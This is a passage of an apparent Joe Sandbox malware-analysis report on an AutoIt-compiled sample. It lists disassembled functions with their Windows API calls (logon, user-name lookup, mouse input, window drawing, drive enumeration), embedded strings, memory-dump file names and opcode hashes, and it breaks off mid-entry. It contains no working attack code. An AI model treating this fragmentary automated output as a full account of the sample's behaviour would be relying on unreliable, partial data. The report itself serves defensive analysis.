                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: mouse_event
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2434400541-0
                                                                                                                                                  • Opcode ID: 9cae1152c28260cbd3e2c0b4d56dc60caeb96eeb1bc75ee8fe4edf41e3b65721
                                                                                                                                                  • Instruction ID: 2018077ddd80e998596efdf050df67948d3f88f5f338517b5b577f31f31b9b74
                                                                                                                                                  • Opcode Fuzzy Hash: 9cae1152c28260cbd3e2c0b4d56dc60caeb96eeb1bc75ee8fe4edf41e3b65721
                                                                                                                                                  • Instruction Fuzzy Hash: 65D052A8160F3A38EC180324FE0FF3F0208E3007C1F9446497012C98C2FCF668A1A431
                                                                                                                                                  Function 00C19369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00C18FA7,?,00C18FA7,?,?,?,00000001,?,?), ref: 00C19389
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LogonUser
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1244722697-0
                                                                                                                                                  • Opcode ID: c90a5d794b9cbbda11ea4afe08d98f160cd4b39c22880b8a13b11b2a49aa5321
                                                                                                                                                  • Instruction ID: 6318cc02674385b4d8215253fa9aa8d7c87ab09d517dfe7e2ea88d5198eec417
                                                                                                                                                  • Opcode Fuzzy Hash: c90a5d794b9cbbda11ea4afe08d98f160cd4b39c22880b8a13b11b2a49aa5321
                                                                                                                                                  • Instruction Fuzzy Hash: 63D05E3226060EABEF018EA4DC01FAE3B69EB04B01F408111FE15D50A1C775D835AB60
                                                                                                                                                  Function 00C00722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 00C00734
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: NameUser
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2645101109-0
                                                                                                                                                  • Opcode ID: c5c0bffd6c2f6902acd209bf1fda33d17c04b7795366b600072be92ec0d0f174
                                                                                                                                                  • Instruction ID: 5bcfed79fc47e7438eb6c017a9e97b61cd5cef8fad15f1599476318f0a8fb052
                                                                                                                                                  • Opcode Fuzzy Hash: c5c0bffd6c2f6902acd209bf1fda33d17c04b7795366b600072be92ec0d0f174
                                                                                                                                                  • Instruction Fuzzy Hash: E5C04CF5814109DBCB05DBA0D988FEE7BBCAB04315F200055A105F2140D7749B44CA71
                                                                                                                                                  Function 00BEA354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00BEA35A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                  • Opcode ID: cf5bf5521cd3a8fab537b7d0aad0411c9a160c4963b7b382e00ae5903165ed9b
                                                                                                                                                  • Instruction ID: 825ff9ea14f00dce47bd3c58321a6a15ff64ef1031e43300b605d8141caa7e18
                                                                                                                                                  • Opcode Fuzzy Hash: cf5bf5521cd3a8fab537b7d0aad0411c9a160c4963b7b382e00ae5903165ed9b
                                                                                                                                                  • Instruction Fuzzy Hash: 6DA0223002030CFBCF002F82FC08A8CBFACEB003A2B008020F80C80032CB33A8A08AC0
                                                                                                                                                  Function 00C43BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CharUpperBuffW.USER32(?,?,00C50980), ref: 00C43C65
                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 00C43C89
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuffCharUpperVisibleWindow
                                                                                                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                                  • API String ID: 4105515805-45149045
                                                                                                                                                  • Opcode ID: 5c259f79a1bb0118e368c4cb7f73bd94775246a4145b5132522ca72f2f963e75
                                                                                                                                                  • Instruction ID: 5ba7b3c3d7a9453c829acc2cb3be974aa387c7bbc1db64a263736a29f3811108
                                                                                                                                                  • Opcode Fuzzy Hash: 5c259f79a1bb0118e368c4cb7f73bd94775246a4145b5132522ca72f2f963e75
                                                                                                                                                  • Instruction Fuzzy Hash: FFD183302142459BCB14EF51C891BAEB7E1FF95354F2484ACFC565B2A2CB31EE4ADB41
                                                                                                                                                  Function 00C4ABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00C4AC55
                                                                                                                                                  • GetSysColorBrush.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,00BFBC7B,?,?), ref: 00C4AC86
                                                                                                                                                  • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,00BFBC7B,?,?), ref: 00C4AC92
                                                                                                                                                  • SetBkColor.GDI32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00BFBC7B,?), ref: 00C4ACAC
                                                                                                                                                  • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BFBC7B,?), ref: 00C4ACBB
                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00BFBC7B), ref: 00C4ACE6
                                                                                                                                                  • GetSysColor.USER32(00000010,?,?,?,?,?,?,?,?,?,?,?,?,00BFBC7B,?,?), ref: 00C4ACEE
                                                                                                                                                  • CreateSolidBrush.GDI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00BFBC7B,?,?), ref: 00C4ACF5
                                                                                                                                                  • FrameRect.USER32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00BFBC7B), ref: 00C4AD04
                                                                                                                                                  • DeleteObject.GDI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00BFBC7B,?,?), ref: 00C4AD0B
                                                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE,?,?,?,?,?,?,?,?,?,?,?,?,00BFBC7B), ref: 00C4AD56
                                                                                                                                                  • FillRect.USER32(?,?,?), ref: 00C4AD88
                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C4ADB3
                                                                                                                                                    • Part of subcall function 00C4AF18: GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000,?), ref: 00C4AF51
                                                                                                                                                    • Part of subcall function 00C4AF18: SetTextColor.GDI32(?,?,00000000,?,?,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000), ref: 00C4AF55
                                                                                                                                                    • Part of subcall function 00C4AF18: GetSysColorBrush.USER32(0000000F,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000,?,?), ref: 00C4AF6B
                                                                                                                                                    • Part of subcall function 00C4AF18: GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000,?,?), ref: 00C4AF76
                                                                                                                                                    • Part of subcall function 00C4AF18: GetSysColor.USER32(00000011,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000,?,?), ref: 00C4AF93
                                                                                                                                                    • Part of subcall function 00C4AF18: CreatePen.GDI32(00000000,00000001,00743C00,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000,?,?), ref: 00C4AFA1
                                                                                                                                                    • Part of subcall function 00C4AF18: SelectObject.GDI32(?,00000000,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000,?,?), ref: 00C4AFB2
                                                                                                                                                    • Part of subcall function 00C4AF18: SetBkColor.GDI32(?,00000000,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000,?,?), ref: 00C4AFBB
                                                                                                                                                    • Part of subcall function 00C4AF18: SelectObject.GDI32(?,?,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000,?,?), ref: 00C4AFC8
                                                                                                                                                    • Part of subcall function 00C4AF18: InflateRect.USER32(?,000000FF,000000FF,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000,?,?), ref: 00C4AFE7
                                                                                                                                                    • Part of subcall function 00C4AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005,?,?,?,?,?,?,?,00C4AC1F,?), ref: 00C4AFFE
                                                                                                                                                    • Part of subcall function 00C4AF18: GetWindowLongW.USER32(00000000,000000F0,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000,?,?), ref: 00C4B013
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4124339563-0
                                                                                                                                                  • Opcode ID: f1d509b19933786ca4775d3327335a5265db916af2f2aff58db77d77e2dacd2c
                                                                                                                                                  • Instruction ID: ff00cbf53763bbb12a509bb10d2a62a2875fb30faa20f556867d98c2ef1e93e4
                                                                                                                                                  • Opcode Fuzzy Hash: f1d509b19933786ca4775d3327335a5265db916af2f2aff58db77d77e2dacd2c
                                                                                                                                                  • Instruction Fuzzy Hash: C1A16876408301AFD7519F64DC48B6FBBA9FF88322F600A19F962E61A0D731D984CB52
                                                                                                                                                  Function 00BC2FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DestroyWindow.USER32(?,?,?), ref: 00BC3072
                                                                                                                                                  • DeleteObject.GDI32(00000000,?,?,?), ref: 00BC30B8
                                                                                                                                                  • DeleteObject.GDI32(00000000,?,?,?), ref: 00BC30C3
                                                                                                                                                  • DestroyIcon.USER32(00000000,?,?,?), ref: 00BC30CE
                                                                                                                                                  • DestroyWindow.USER32(00000000,?,?,?), ref: 00BC30D9
                                                                                                                                                  • SendMessageW.USER32(?,00001308,?,00000000,?,?), ref: 00BFC77C
                                                                                                                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00BFC7B5
                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00BFCBDE
                                                                                                                                                    • Part of subcall function 00BC1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BC2412,?,00000000,?,?,?,?,00BC1AA7,00000000,?), ref: 00BC1F76
                                                                                                                                                  • SendMessageW.USER32(?,00001053), ref: 00BFCC1B
                                                                                                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00BFCC32
                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00BFCC48
                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00BFCC53
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 464785882-4108050209
                                                                                                                                                  • Opcode ID: 36160154bf562a349474afa2f05ae23d65af2d464327f4b7ae05faba6e15c7f9
                                                                                                                                                  • Instruction ID: 7d2d520cb40556a313b13c50e73e92c8579ef04a69ea870ab695ddb8773acef8
                                                                                                                                                  • Opcode Fuzzy Hash: 36160154bf562a349474afa2f05ae23d65af2d464327f4b7ae05faba6e15c7f9
                                                                                                                                                  • Instruction Fuzzy Hash: 7B128A35600209AFCB25CF24C984BB9BBE1FF45701F5485ADEA85DB262C731ED89CB91
                                                                                                                                                  Function 00BD27FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                                                                                                  • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                  • API String ID: 2660009612-1645009161
                                                                                                                                                  • Opcode ID: 7751d22c408a896fa4644126b0ac0f415c4ef2630ad0c0961a28686c50b3c758
                                                                                                                                                  • Instruction ID: 0dc9dfcd11b52d1f18dc0aa7fe1da2d22873ba82fbbec8fe33f2bd45e3f2e618
                                                                                                                                                  • Opcode Fuzzy Hash: 7751d22c408a896fa4644126b0ac0f415c4ef2630ad0c0961a28686c50b3c758
                                                                                                                                                  • Instruction Fuzzy Hash: 73A1D534A00289BBDB20AF51CC52EBEB7F4EF55740F1400AAFC15AB292EB719E41E750
                                                                                                                                                  Function 00C37B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 00C37BC8
                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C37C87
                                                                                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00C37CC5
                                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00C37CD7
                                                                                                                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00C37D1D
                                                                                                                                                  • GetClientRect.USER32(00000000,?,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00C37D29
                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 00C37D6D
                                                                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00C37D7C
                                                                                                                                                  • GetStockObject.GDI32(00000011,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00C37D8C
                                                                                                                                                  • SelectObject.GDI32(00000000,00000000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 00C37D90
                                                                                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00C37DA0
                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 00C37DA9
                                                                                                                                                  • DeleteDC.GDI32(00000000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00C37DB2
                                                                                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?,?,50000000), ref: 00C37DDE
                                                                                                                                                  • SendMessageW.USER32(00000030,00000000,00000001,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00C37DF5
                                                                                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000,?,50000000,?,00000004,00000500), ref: 00C37E30
                                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00C37E44
                                                                                                                                                  • SendMessageW.USER32(00000404,00000001,00000000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00C37E55
                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000,?,50000000,?,00000004,00000500), ref: 00C37E85
                                                                                                                                                  • GetStockObject.GDI32(00000011,00000001,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 00C37E90
                                                                                                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 00C37E9B
                                                                                                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00C37EA5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                  • API String ID: 2910397461-517079104
                                                                                                                                                  • Opcode ID: aa12310f52ce82f5732811a417b19183b021fef5ae14f3f1bd2536291ca7689a
                                                                                                                                                  • Instruction ID: e5a1391703ef742571a8c9b512c4862e2ae53afc9e9e92b0dc2daea2553a2fe9
                                                                                                                                                  • Opcode Fuzzy Hash: aa12310f52ce82f5732811a417b19183b021fef5ae14f3f1bd2536291ca7689a
                                                                                                                                                  • Instruction Fuzzy Hash: 7FA17FB5A00619BFEB14DBA4DC4AFAE7BB9EB04711F104254FA15E72E0D770AD40CB64
                                                                                                                                                  Function 00C2B353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00C2B361
                                                                                                                                                  • GetDriveTypeW.KERNEL32(?,00C52C4C,?,\\.\,00C50980), ref: 00C2B43E
                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00C52C4C,?,\\.\,00C50980), ref: 00C2B59C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorMode$DriveType
                                                                                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                  • API String ID: 2907320926-4222207086
                                                                                                                                                  • Opcode ID: 7ee0b66bf97dfd3c55afd2ed131d52b85cf7a5d79719bb81c67374e1ab3f1baf
                                                                                                                                                  • Instruction ID: 9647b792c3e7064954f3488798aee8efe33e7deb000c446311548a3937117475
                                                                                                                                                  • Opcode Fuzzy Hash: 7ee0b66bf97dfd3c55afd2ed131d52b85cf7a5d79719bb81c67374e1ab3f1baf
                                                                                                                                                  • Instruction Fuzzy Hash: 0451DB30B40219EBC704EB21E982B7D77F0AF44740B24C076F41AABA91E731AF81EB55
                                                                                                                                                  Function 00C4A041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00C4A0F7
                                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00C4A1B0
                                                                                                                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 00C4A1CC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
